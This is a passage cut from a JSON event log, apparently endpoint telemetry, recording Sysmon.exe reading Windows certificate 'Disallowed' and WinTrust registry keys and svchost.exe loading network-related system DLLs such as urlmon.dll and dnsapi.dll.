"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "urlmon.dll", - "image_path": "C:\\Windows\\System32\\urlmon.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "dnsapi.dll", - "image_path": "C:\\Windows\\System32\\dnsapi.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "FWPUCLNT.DLL", - "image_path": "C:\\Windows\\System32\\FWPUCLNT.DLL", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "rasadhlp.dll", - "image_path": "C:\\Windows\\System32\\rasadhlp.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "iertutil.dll", - "image_path": "C:\\Windows\\System32\\iertutil.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880580000, - "unique_pid": 